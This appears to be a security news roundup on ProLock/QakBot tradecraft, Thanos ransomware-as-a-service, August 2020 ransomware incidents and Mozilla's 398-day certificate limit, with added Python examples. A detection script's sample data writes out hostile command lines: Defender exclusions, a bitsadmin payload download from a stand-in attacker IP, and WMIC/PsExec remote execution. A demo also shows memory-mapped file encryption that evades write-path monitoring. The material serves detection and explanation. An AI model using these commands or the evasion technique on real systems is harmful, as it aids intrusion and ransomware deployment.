Prolock Ransomware 🔓 Unlocked

ProLock ransomware operators have deployed a large number of attacks over the past six months using a standard operating playbook, averaging close to one target every day.

The operation started in late 2019 under the name PwndLocker. After a bug in its encryption routine allowed victims to recover their files for free, the operators fixed the flaw and rebooted the operation under the name ProLock.

A fresh start in March under the ProLock label also meant increased activity and larger ransoms; the average demand has since swelled to $1.8 million.

Simple operation

The threat actor has no preference for the sector its targets operate in, as long as they are companies with large networks that are able to pay a higher ransom. The focus seems to be on businesses in Europe and North America.

The group’s tactics, techniques, and procedures are simple and effective: a partnership with the QakBot (QBot) banking trojan gives them the foothold they use to map the network, move laterally, and ultimately deploy the ransomware.

Between the initial compromise and running the file-encryption routine, the actor spends about a month on the network, gathering information for better targeting and exfiltrating data (via Rclone).

Running ProLock on the target network is the last step of the attack, which typically starts with a spear-phishing email carrying weaponized VBScripts and Office documents that deliver QakBot, often sent as replies in hijacked email threads.

Once on the target host, QakBot establishes persistence and keeps active defenses from spotting it by modifying the Windows Registry to add its binaries to the list of Windows Defender exclusions.

“QakBot also collects a lot of information about the infected host, including the IP address, hostname, domain, and list of installed programs. The threat actor acquires a basic understanding of the network and can plan post-exploitation activities.”

With tools like BloodHound and AdFind, the threat actor profiles the environment and distributes the banking trojan to other hosts on the network. In some cases this was done manually using PsExec, suggesting a strong connection between the ProLock and QakBot operators.

Moving laterally also involved the use of Remote Desktop (RDP); when this was not enabled on a machine, the actor ran the following batch script via PsExec to enable the remote connection:

ProLock’s toolkit includes Mimikatz, the credential-dumping post-exploitation tool used by penetration testers, which is deployed through Cobalt Strike, the red-team framework.

The ransomware actor sometimes relies on a Windows vulnerability (CVE-2019-0859) to escalate privileges on compromised systems.

The file-encrypting malware lands on the host either via QakBot, by downloading it with the Background Intelligent Transfer Service (BITS) from the attacker’s server, or by executing a script on a remote host through Windows Management Instrumentation (WMIC).
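The tradecraft described above (Defender exclusions written to the registry, PsExec and WMIC for remote execution, BITS for staging the payload, and a script that re-enables RDP) leaves process command lines that a SOC can hunt for. What follows is an added example, not code from the report or from the ProLock operators: a small Python rule set run over constructed sample process-creation records. The records, host names, paths and the 203.0.113.10 address are made up; the rule that keys on fDenyTSConnections assumes the RDP-enabling script cleared that registry value, since the page does not reproduce the script.

```python
import re
from collections import defaultdict

# Constructed sample process-creation records. These are NOT real telemetry
# from a ProLock intrusion; the layout is a simplified stand-in for what an
# EDR or Sysmon (Event ID 1) pipeline would provide.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": r"CORP\jdoe", "parent": "winword.exe",
     "cmdline": r'reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" '
                r'/v "C:\Users\jdoe\AppData\Roaming\upd\client.exe" /t REG_DWORD /d 0 /f'},
    {"host": "WS01", "user": r"CORP\jdoe", "parent": "cmd.exe",
     "cmdline": r"bitsadmin /transfer upd /download /priority high "
                r"http://203.0.113.10/p.exe C:\Windows\Temp\p.exe"},
    {"host": "WS01", "user": r"CORP\jdoe", "parent": "cmd.exe",
     "cmdline": r'wmic /node:FS02 process call create "cmd /c C:\Windows\Temp\run.bat"'},
    {"host": "WS01", "user": r"CORP\jdoe", "parent": "cmd.exe",
     "cmdline": r"psexec.exe \\FS02 -s cmd /c C:\Windows\Temp\enable_rdp.bat"},
    {"host": "FS02", "user": r"NT AUTHORITY\SYSTEM", "parent": "cmd.exe",
     "cmdline": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" '
                r"/v fDenyTSConnections /t REG_DWORD /d 0 /f"},
    {"host": "WS03", "user": r"CORP\it-admin", "parent": "explorer.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\Get-Inventory.ps1"},  # benign admin activity
]

RULES = [
    # QakBot adding its binaries to Defender's exclusion list (registry or cmdlet form)
    ("defender_exclusion_added",
     re.compile(r"Windows Defender\\Exclusions|Add-MpPreference\s+-Exclusion", re.I)),
    # ProLock payload pulled from the attacker's server with BITS
    ("bits_download",
     re.compile(r"bitsadmin(?:\.exe)?\s.*?/transfer|Start-BitsTransfer", re.I)),
    # script executed on a remote host through WMIC
    ("wmic_remote_process_create",
     re.compile(r"wmic(?:\.exe)?\s+/node:\S+.*?process\s+call\s+create", re.I)),
    # PsExec against a remote host (lateral movement, pushing the RDP-enable script)
    ("psexec_remote_exec",
     re.compile(r"psexec(?:64)?(?:\.exe)?\s+\\\\\S+", re.I)),
    # Assumption: the page does not show the batch script; the usual way to enable
    # RDP is clearing fDenyTSConnections, so this rule keys on that value.
    ("rdp_enabled_via_registry",
     re.compile(r"fDenyTSConnections.*?(?:/d\s+0\b|-Value\s+0\b)", re.I)),
]


def excluded_path(cmdline: str):
    """Pull the path being excluded out of a reg add / Add-MpPreference command line."""
    m = re.search(r'/v\s+"([^"]+)"|/v\s+(\S+)|-ExclusionPath\s+"?([^"\s]+)', cmdline, re.I)
    return next((g for g in m.groups() if g), None) if m else None


def detect(events):
    """Run every rule over every record; one hit per (record, rule) match."""
    hits = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                hit = {"host": ev["host"], "user": ev["user"], "rule": name,
                       "cmdline": ev["cmdline"]}
                if name == "defender_exclusion_added":
                    hit["excluded_path"] = excluded_path(ev["cmdline"])
                hits.append(hit)
    return hits


def summarize(hits):
    """Distinct rule names that fired, per host."""
    per_host = defaultdict(set)
    for h in hits:
        per_host[h["host"]].add(h["rule"])
    return {host: sorted(rules) for host, rules in per_host.items()}


def likely_hands_on_keyboard(summary, min_rules: int = 2):
    """Hosts where several stages of the chain fired: triage these first."""
    return sorted(h for h, rules in summary.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for h in found:
        print(f"{h['host']:5} {h['rule']:28} {h['cmdline'][:70]}")
    print("triage first:", likely_hands_on_keyboard(summarize(found)))
```

Any single rule here is noisy on its own (administrators do run PsExec and add Defender exclusions); the value is in the per-host correlation, which is why the summary counts distinct stages rather than raw hits.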

Despite using standard tools, ProLock attacks remain largely undetected on the network, giving them time to prepare the file encryption stage and steal data.

Thanos 💀… A review of Ransomware as a Service

Thanos, a Ransomware-as-a-Service (RaaS), was found on sale on Russian-language underground forums. It is offered as a private ransomware builder with 43 different configuration options. Recently, the malware added a Windows MBR locker module.

Targeted victims

On July 6 and July 9, 2020, files associated with Thanos ransomware (aka Hakbit) were observed in an attack targeting two state-run organizations located in the Middle East and North Africa.

In June 2020, an email-based ransomware campaign was found targeting organizations located in Western Europe (Austria, Switzerland, and Germany). The attack campaign reportedly leveraged the Thanos builder tool.

Mode of operation

The ransomware is available as a service and offers its users the ability to create custom ransomware payloads.

The ransomware uses RIPlace, a proof-of-concept file-replacement technique that renames files through a legacy DosDevice alias so that filter-driver based anti-ransomware products cannot resolve the destination of the rename and let it through, to bypass anti-ransomware mitigations.
For propagation, it uses the legitimate PsExec tool to execute the ransomware on network-connected devices.

Thanos also spreads via common infection vectors, such as social engineering, phishing, and spam emails.

The ransomware builder is developed by a threat actor using the handle Nosophoros.
It has been promoted as a private ransomware builder on Russian-speaking hacker forums since February.

Thanos is also marketed on a profit-sharing basis: enlisted hackers and malware distributors receive a revenue share of about 60-70% of ransom payments for distributing the ransomware.

Organizations need to be vigilant and must proactively update their anti-malware solutions, back up important data, and deploy a secure email gateway and network firewalls to block potential threats.

Rainy Ransomware August! Storm hit

Large-scale breaches have mushroomed in 2020, with a 273% increase in the first quarter compared to the previous year. Ransomware is among the most common types of attack and is up by 90%, according to a recent report.

Tricks up their Sleeves

Ransomware operators have started using memory-mapped I/O to encrypt files, making it harder for behavior-based anti-ransomware solutions to observe the malicious writes.

WastedLocker uses this technique to encrypt documents through the file cache in memory: the modified pages are written back by the Windows cache manager rather than by the ransomware process’s own write calls, so it causes no additional disk I/O of its own, which can shield it from behavior-monitoring software.
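To see why memory-mapped encryption slips past hooks on the write path, here is an added example in Python (not WastedLocker’s code, and not from the report): it transforms a constructed temporary file in place through a writable mmap, so the bytes on disk change without the process ever issuing a write() call. The keystream is a SHA-256 counter construction used purely for illustration, not a real cipher; the key, file name and contents are made up.

```python
import hashlib
import mmap
import os
import tempfile

BLOCK = 32  # SHA-256 digest length; the toy keystream is produced in 32-byte blocks


def keystream_block(key: bytes, index: int) -> bytes:
    # Toy counter-mode keystream from SHA-256. Illustration only: real ransomware
    # (and real software) uses a proper stream or block cipher.
    return hashlib.sha256(key + index.to_bytes(8, "big")).digest()


def keystream(key: bytes, offset: int, length: int) -> bytes:
    # Keystream bytes covering file positions [offset, offset + length).
    out = bytearray()
    index, skip = divmod(offset, BLOCK)
    while len(out) < skip + length:
        out += keystream_block(key, index)
        index += 1
    return bytes(out[skip:skip + length])


def xor_file_via_mmap(path: str, key: bytes, chunk: int = 1 << 20) -> int:
    """XOR the whole file with the keystream through a writable memory mapping.

    No write() is issued by this process: plain memory stores dirty the cached
    pages and the OS writes them back later. That is the property that lets
    mmap-based encryption evade monitors hooked only on the write path.
    Returns the number of bytes transformed. XOR is its own inverse, so calling
    this twice with the same key restores the file.
    """
    size = os.path.getsize(path)
    if size == 0:
        return 0  # mmap refuses a zero-length mapping
    with open(path, "r+b") as f:
        with mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_WRITE) as m:
            for off in range(0, size, chunk):
                end = min(off + chunk, size)
                ks = keystream(key, off, end - off)
                plain = int.from_bytes(m[off:end], "big")
                m[off:end] = (plain ^ int.from_bytes(ks, "big")).to_bytes(end - off, "big")
            m.flush()  # asks for writeback of dirty pages; still not a write() call
    return size


def demo() -> dict:
    """Constructed input: a temp file with made-up content; returns what a caller can check."""
    original = b"Quarterly numbers, do not share.\n" * 100  # 3300 bytes
    key = b"demo-key-not-for-real-use"
    fd, path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(original)
        transformed = xor_file_via_mmap(path, key)
        with open(path, "rb") as f:
            encrypted = f.read()
        xor_file_via_mmap(path, key)  # second pass undoes the first
        with open(path, "rb") as f:
            restored = f.read()
    finally:
        os.remove(path)
    return {
        "bytes": transformed,
        "changed": encrypted != original,
        "size_preserved": len(encrypted) == len(original),
        "restored": restored == original,
    }


if __name__ == "__main__":
    print(demo())
```

The transform and its inverse leave the file size unchanged and restore the original, yet a monitor that only hooks this process’s write calls sees nothing: the dirty pages are flushed by the kernel’s cache manager, on Windows as paging I/O in the System process context, which is where detection has to look instead (section creation and paging writes, correlated back to the mapping process).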

Researchers have identified a new element in recent Sodinokibi (REvil) campaigns: the operators scan compromised networks for point-of-sale (PoS) software in order to make additional money from payment-card data, either by using it directly to drain accounts or by selling it on underground forums.

Ransomware Attackers Up the Ante
Maze ransomware operators have allegedly infected the network of SK Hynix, the RAM and flash memory supplier, and leaked some of the stolen files on their website as proof of the intrusion, holding the semiconductor giant to ransom.

A ransomware attack targeted the services of SnapFulfil, a cloud-based warehouse management software provider, disrupting warehouse operations for at least one of its customers. The U.K.-based company is working with the National Cyber Security Centre (NCSC) and the National Crime Agency (NCA) to restore its systems.

In a ransomware attack on one of the brands of the British-American cruise operator Carnival, hackers accessed guest and employee data and encrypted part of the brand’s IT systems.

Netwalker ransomware operators attacked Forsee Power, a lithium-ion battery systems provider, and shared a few screenshots of folders containing sensitive data as evidence of the breach on their online blog.

Brown-Forman, the maker of Jack Daniel’s, lost 1TB of corporate data to Sodinokibi ransomware. Other firms that fell victim to ransomware attacks this month include Konica Minolta, SPIE group, R1 RCM, Boyce Technologies, LG, Xerox, and Canon.

While many organizations rely on conventional signature-based solutions to protect their data, files, and systems, they need a more comprehensive approach to address the threats posed by evolving ransomware. Endpoint security alone does not protect… Defence in depth must be maintained at a granular level to uphold security.

Mozilla cuts Certificate lifespan

Mozilla is planning to implement the change in the coming months, regardless of the outcome of a vote on the issue by a key industry group.

The CA/Browser Forum, which sets policies for certificate authorities and browser makers, has been considering the change for some time, and the proposal has significant support among browser vendors. An updated version of the proposal that would reduce the maximum lifespan of TLS certificates to 398 days is currently under consideration.

Currently, the policy allows a maximum lifespan of 825 days, or about 27 months. A lot can change in that amount of time, and that’s one of the main reasons Mozilla and other companies support the change. TLS certificates serve several purposes, including enabling encrypted sessions between clients and the site.

“TLS certificates provide authentication, meaning that you can be sure that you are sending information to the correct server and not to an imposter trying to steal your information. If the owner of the domain changes or the cloud service provider changes, the holder of the TLS certificate’s private key (e.g. the previous owner of the domain or the previous cloud service provider) can impersonate the website until that TLS certificate expires,” Ben Wilson, technical program manager at Mozilla, said in a post detailing the company’s position.

Long lifespans for TLS certificates can be problematic in a number of ways beyond the potential for impersonation. To remain compatible with various browsers and client systems, certificates are issued with key types and signature hash algorithms that those clients support. That’s all fine until a serious issue with one of those algorithms necessitates revoking and reissuing certificates. This is relatively rare, but when it happens it’s a major disruption for site owners, CAs, and individuals trying to make a secure connection to an affected site.

In recent years, collisions found in both the SHA-1 and MD5 hash algorithms put certificates signed with either algorithm at risk of forgery. The issues were public, but because of the long lifespans of TLS certificates at the time the collisions were disclosed, it took many years to phase out all of the affected certificates. Reducing the lifespan of certificates would mitigate this kind of problem while also limiting the amount of time a given key pair is valid.

Keys valid for longer than one year have greater exposure to compromise, and a compromised key could enable an attacker to intercept secure communications and/or impersonate a website until the TLS certificate expires. Good security practice is to change key pairs frequently, which should happen whenever you obtain a new certificate.

The current proposal would have the 398-day lifespan take effect on Sept. 1 if it passes. But even if the proposal fails, Mozilla intends to change its policy to limit certificate lifespans to 398 days.
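The 398-day rule is easy to check against a certificate’s notBefore/notAfter pair. The following Python is an added example, not code from Mozilla or the CA/Browser Forum: it parses the date format that ssl.getpeercert() returns, computes the validity period, and applies the 398-day cap to certificates issued on or after the Sept. 1, 2020 cutoff and the older 825-day cap to earlier ones. The sample dates are constructed; lifespan_of_peer() is a convenience wrapper that fetches a live certificate and is not exercised offline.

```python
import socket
import ssl
from datetime import datetime, timezone

# Policy constants from the proposal discussed above.
NEW_MAX_DAYS = 398      # cap for certificates issued on or after the cutoff
LEGACY_MAX_DAYS = 825   # cap in force before the change
CUTOFF = datetime(2020, 9, 1, tzinfo=timezone.utc)


def parse_cert_time(s: str) -> datetime:
    """Parse the 'Mon DD HH:MM:SS YYYY GMT' form used by ssl.getpeercert()."""
    return datetime.fromtimestamp(ssl.cert_time_to_seconds(s), tz=timezone.utc)


def check_lifespan(not_before: str, not_after: str) -> dict:
    """Validity period in whole days and whether it fits the cap that applies."""
    nb, na = parse_cert_time(not_before), parse_cert_time(not_after)
    days = (na - nb).days
    issued_after_cutoff = nb >= CUTOFF
    limit = NEW_MAX_DAYS if issued_after_cutoff else LEGACY_MAX_DAYS
    return {
        "not_before": nb.isoformat(),
        "not_after": na.isoformat(),
        "days": days,
        "limit": limit,
        "issued_after_cutoff": issued_after_cutoff,
        "compliant": days <= limit,
    }


def lifespan_of_peer(host: str, port: int = 443, timeout: float = 5.0) -> dict:
    """Live variant: pull the leaf certificate from a server (needs network access)."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            cert = tls.getpeercert()
    return check_lifespan(cert["notBefore"], cert["notAfter"])


# Constructed sample validity periods (not real certificates).
SAMPLES = [
    ("Sep  1 00:00:00 2020 GMT", "Oct  4 00:00:00 2021 GMT"),   # exactly 398 days, new regime
    ("Sep  1 00:00:00 2020 GMT", "Oct  5 00:00:00 2021 GMT"),   # one day over the new cap
    ("Aug 31 00:00:00 2020 GMT", "Dec  4 00:00:00 2022 GMT"),   # 825 days, issued before cutoff
]


if __name__ == "__main__":
    for nb, na in SAMPLES:
        r = check_lifespan(nb, na)
        print(f"{r['days']:4d} days (limit {r['limit']}) -> "
              f"{'ok' if r['compliant'] else 'TOO LONG'}")
```

The check treats the validity period as notAfter minus notBefore in whole days; browsers may count the two bounds inclusively or compare in seconds, so when validating a certificate for a particular client, use that client’s exact interpretation rather than this one.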

Apple recently announced that it will enforce the same 398-day limit starting September 2020.